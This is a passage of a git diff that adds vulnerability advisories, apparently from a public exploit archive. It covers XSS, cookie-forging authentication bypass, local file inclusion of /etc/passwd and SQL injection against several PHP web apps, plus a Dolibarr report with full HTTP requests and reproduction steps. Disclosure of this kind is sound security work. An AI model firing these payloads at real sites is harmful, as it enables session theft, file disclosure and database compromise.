-https://192.168.1.50/network/network?new_domain[$ne]=blah - Return: {"$ne"=>"blah"} is not a valid host // Exploitable? - 2)Source code Info-leak: - https://192.168.1.50/manual/csc?mode=%3C/script%3E - --- -kmkz -PGP: B24EAF34 - diff --git a/platforms/php/webapps/33993.txt b/platforms/php/webapps/33993.txt new file mode 100755 index 000000000..c55f5c3d4 --- /dev/null +++ b/platforms/php/webapps/33993.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40203/info + +Planet Script is prone to a cross-site scripting vulnerability because the it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Planet Script 1.3 and prior are vulnerable. + +http://www.example.com/idomains.php?do=encode&decoded=&ext=[ Xss ] \ No newline at end of file diff --git a/platforms/php/webapps/33994.txt b/platforms/php/webapps/33994.txt new file mode 100755 index 000000000..d337c3092 --- /dev/null +++ b/platforms/php/webapps/33994.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40207/info + +PonVFTP is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication. + +Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks. + +The following example data is available: + +javascript:document.cookie="username=admin"; \ No newline at end of file diff --git a/platforms/php/webapps/33997.txt b/platforms/php/webapps/33997.txt new file mode 100755 index 000000000..b1521abd0 --- /dev/null +++ b/platforms/php/webapps/33997.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40227/info + +NPDS Revolution is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +NPDS Revolution 10.02 is vulnerable; prior versions may also be affected. + +http://www.example.com/download.php?op=geninfo&did=1%22%3E%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E diff --git a/platforms/php/webapps/33998.html b/platforms/php/webapps/33998.html new file mode 100755 index 000000000..79f3d6b4e --- /dev/null +++ b/platforms/php/webapps/33998.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40230/info + +The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Versions prior to JComments 2.2 are vulnerable. + +
\ No newline at end of file diff --git a/platforms/php/webapps/33999.txt b/platforms/php/webapps/33999.txt new file mode 100755 index 000000000..cefeee3c5 --- /dev/null +++ b/platforms/php/webapps/33999.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/40232/info + +Mobile Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Mobile Chat 2.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/Mobile/main/chatsmileys.php/>"> + diff --git a/platforms/php/webapps/34003.txt b/platforms/php/webapps/34003.txt new file mode 100755 index 000000000..6b4b014b6 --- /dev/null +++ b/platforms/php/webapps/34003.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/40244/info + +Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +The following Percha components are affected: + +com_perchaimageattach +com_perchafieldsattach +com_perchadownloadsattach +com_perchagallery +com_perchacategoriestree + + http://www.example.com/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/34004.txt b/platforms/php/webapps/34004.txt new file mode 100755 index 000000000..e68c83e75 --- /dev/null +++ b/platforms/php/webapps/34004.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/40244/info + +Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +The following Percha components are affected: + +com_perchaimageattach +com_perchafieldsattach +com_perchadownloadsattach +com_perchagallery +com_perchacategoriestree + +http://www.example.com/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/34005.txt b/platforms/php/webapps/34005.txt new file mode 100755 index 000000000..b3a803e27 --- /dev/null +++ b/platforms/php/webapps/34005.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/40244/info + +Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +The following Percha components are affected: + +com_perchaimageattach +com_perchafieldsattach +com_perchadownloadsattach +com_perchagallery +com_perchacategoriestree + +http://www.example.com/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/34006.txt b/platforms/php/webapps/34006.txt new file mode 100755 index 000000000..0b5b6f61e --- /dev/null +++ b/platforms/php/webapps/34006.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/40244/info + +Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +The following Percha components are affected: + +com_perchaimageattach +com_perchafieldsattach +com_perchadownloadsattach +com_perchagallery +com_perchacategoriestree + +http://www.example.com/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/34007.txt b/platforms/php/webapps/34007.txt new file mode 100755 index 000000000..a1b5ea700 --- /dev/null +++ b/platforms/php/webapps/34007.txt @@ -0,0 +1,1289 @@ +Vulnerability Name: SQL injection +Severity: Critical +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: All authenticated users + +Issue details: The "entity" parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the entity parameter, and a database error message was returned. + +The database appears to be MySQL. + +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1' +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): entity + +Steps to replicate: +1. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +2. Click on modify to modify the user details +3. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +4. After starting tamper data addon, click on save to save the user details and intercept the request +5. Manipulate entity parameter original value 1 with 1' and submit the request and see the output in browser +6. A single quote was submitted in the entity parameter, and a database error message was returned that is the proof of vulnerability + +Remediation detail: The application should handle errors gracefully and prevent SQL error messages from being returned in responses. +Issue background: SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands. +Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + +Vulnerability Name: SQL injection + +Severity: Critical + +URL: http://localhost/dolibarr/user/group/index.php +Affected Users: All authenticated users + +Issue details: The "sortorder " parameter appears to be vulnerable to SQL injection attacks. Attack payload 1##xa7## was submitted in the sortorder parameter, and a database error message was returned. + +The database appears to be MySQL. + +HTTP request: +GET /dolibarr/user/group/index.php?begin=&sall=&&search_group=&sortfield=g.nom&sortorder=1%c0%00xa7%c0%a2 HTTP/1.1 +Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=plsgp95ms82gnmrbp544u9tb71 +Host: localhost +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) +Accept: */* + +Affected parameter(s): sortorder + +Steps to replicate: +1. Login into Dolibarr application with any user and put below URL in address bar of the browser and see the response +2. A database error message was returned that is the proof of vulnerability + + + +Remediation detail: The application should handle errors gracefully and prevent SQL error messages from being returned in responses. +Issue background: SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands. +Tools used: Mozilla Firefox browser + + + + + + + + +Vulnerability Name: Link Injection (facilitates Cross-Site Request Forgery) +Severity: Critical +Affected Users: All authenticated users + +Issue details: The value of the dol_hide_leftmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E was submitted in the dol_hide_leftmenu parameter. The test response contained a link to the file "http://www.google.com/sites /overview.html", which proves that the Cross-Site Request Forgery attempt was successful. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.0 +Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94 +Content-Length: 328 +Accept: */* +Accept-Language: en-US +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) +Host: localhost +Content-Type: application/x-www-form-urlencoded +Referer: http://localhost/dolibarr/ + +token=c9f908a134c0df6b6837b3cf06987c90&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu= %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E &dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Steps to replicate: +1. Open Dolibarr application in browser. +2. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +3. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +4. Manipulate dol_hide_leftmenu parameter value with payload %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E and submit the request and see the output in browser +5. The test response contained a link to the file " http://upload.wikimedia.org/wikipedia/ commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png ", which proves that the Cross-Site Request Forgery attempt was successful. Below Parameters are vulnerable to Link Injection vulnerability +Parameter URL +dol_use_jmobile http://localhost/dolibarr/index.php +dol_optimize_smallscreen http://localhost/dolibarr/index.php +dol_no_mouse_hover http://localhost/dolibarr/index.php +dol_hide_topmenu http://localhost/dolibarr/index.php +dol_hide_leftmenu http://localhost/dolibarr/index.php +dol_use_jmobile http://localhost/dolibarr/user/index.php +dol_optimize_smallscreen http://localhost/dolibarr/user/index.php +dol_no_mouse_hover http://localhost/dolibarr/user/index.php +dol_hide_topmenu http://localhost/dolibarr/user/index.php +dol_hide_leftmenu http://localhost/dolibarr/user/index.php +dol_use_jmobile http://localhost/dolibarr/user/logout.php +dol_optimize_smallscreen http://localhost/dolibarr/user/logout.php +dol_no_mouse_hover http://localhost/dolibarr/user/logout.php +dol_hide_topmenu http://localhost/dolibarr/user/logout.php +dol_hide_leftmenu http://localhost/dolibarr/user/logout.php + +Remediation detail: In most situations where user-controllable data is copied into application responses, Link Injection attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + +Vulnerability Name: Cross-site scripting (reflected) +Severity: Critical +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_hide_leftmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ddc8">f1fc4 was submitted in the dol_hide_leftmenu parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=6ddc8">f1fc4&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Affected parameter(s): dol_hide_leftmenu + +Steps to replicate: +1. Open Dolibarr application in browser. +2. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +3. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +4. Manipulate dol_hide_leftmenu parameter value with payload 6ddc8">f1fc4 and submit the request and see the output in browser +5. This input was echoed unmodified in the application's response that is the proof of vulnerability + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + +Vulnerability Name: Cross-site scripting (reflected) +Severity: Critical +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_hide_topmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 0dc2b">8edb9 was submitted in the dol_hide_topmenu parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=0dc2b">8edb9&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Affected parameter(s): dol_hide_topmenu + +Steps to replicate: +6. Open Dolibarr application in browser. +7. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +8. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +9. Manipulate dol_hide_topmenu parameter value with payload 0dc2b">8edb9 and submit the request and see the output in browser +10. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_no_mouse_hover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a37bc">fce43 was submitted in the dol_no_mouse_hover parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=a37bc">fce43&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Affected parameter(s): dol_no_mouse_hover + +Steps to replicate: +11. Open Dolibarr application in browser. +12. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +13. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +14. Manipulate dol_no_mouse_hover parameter value with payload a37bc">fce43 and submit the request and see the output in browser +15. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_optimize_smallscreen request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19600">6f8bd was submitted in the dol_optimize_smallscreen parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=19600">6f8bd&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Affected parameter(s): dol_optimize_smallscreen + +Steps to replicate: +16. Open Dolibarr application in browser. +17. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +18. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +19. Manipulate dol_optimize_smallscreen parameter value with payload 19600">6f8bd and submit the request and see the output in browser +20. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +? +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_use_jmobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88791">d1066 was submitted in the dol_use_jmobile parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 